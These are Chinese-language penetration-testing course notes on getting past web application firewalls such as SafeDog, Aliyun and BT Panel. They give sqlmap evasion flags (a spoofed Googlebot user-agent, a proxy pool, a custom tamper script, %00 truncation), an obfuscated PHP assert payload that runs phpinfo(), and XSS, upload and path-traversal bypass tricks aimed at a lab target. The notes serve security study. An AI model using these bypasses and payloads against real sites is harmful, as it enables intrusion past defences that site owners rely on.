思維導圖
1、SQL注入
如需sqlmap注入測試,
- 防cc攔截:修改user-agent頭+代理(付費代理池)
- 修改user-agent頭:
- (1)加參數:--random-agent
- (2)加參數:--user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
- 各大搜索引擎的User-Agent:https://www.cnblogs.com/iack/p/3557371.html
- (3)修改配置文件sqlmap.conf中的agent變量值
- 加代理:--proxy="http:tps123.kdlapi.com:15818"
- 修改user-agent頭:
- 繞過安全狗:自寫tamper模塊,參考如下waf-dog.py
- 繞過Aliyun:基本修改指紋即可(修改user-agent頭)
- 繞過寶塔:匹配關鍵字外加/*等
python sqlmap.py -u "http://test.xiaodi8.com/sqlilabs/Less-2/?id=1" --proxy="http:tps123.kdlapi.com:15818" --tamper="waf-dog.py" --random-agent
waf-dog.py:

在買了寶塔付費產品后,過狗的payload中含有/*的都會被寶塔攔截。
可以使用%00截斷來繞過。
修改腳本,在使用/*的時候在前面加上%00
另外,抓包查看sqlmap的指紋如下,會被waf攔截,所以需要修改us頭。

2、文件上傳
1.php 截斷,參考之前payload上傳,繞過waf
和前面文件上傳專題的繞過方法一樣。
3、XSS跨站
利用xss trike繞過,加上--timeout或者--proxy繞過cc
4、RCE執行
加密編碼繞過?算法可逆?關鍵字繞過?提交方法?各種測試?
txt=$y=str_replace('x','','pxhpxinxfo()');assert($y);&submit=%E6%8F%90%E4%BA%A4ce
測試,通過。

5、文件包含
以下幾種:..\ ..../ ..\.\等
涉及資源:
- 寶塔官網:https://www.bt.cn/
- safedog官網:http://free.safedog.cn/website_safedog.html
參考:https://www.cnblogs.com/darkerg/p/14779017.html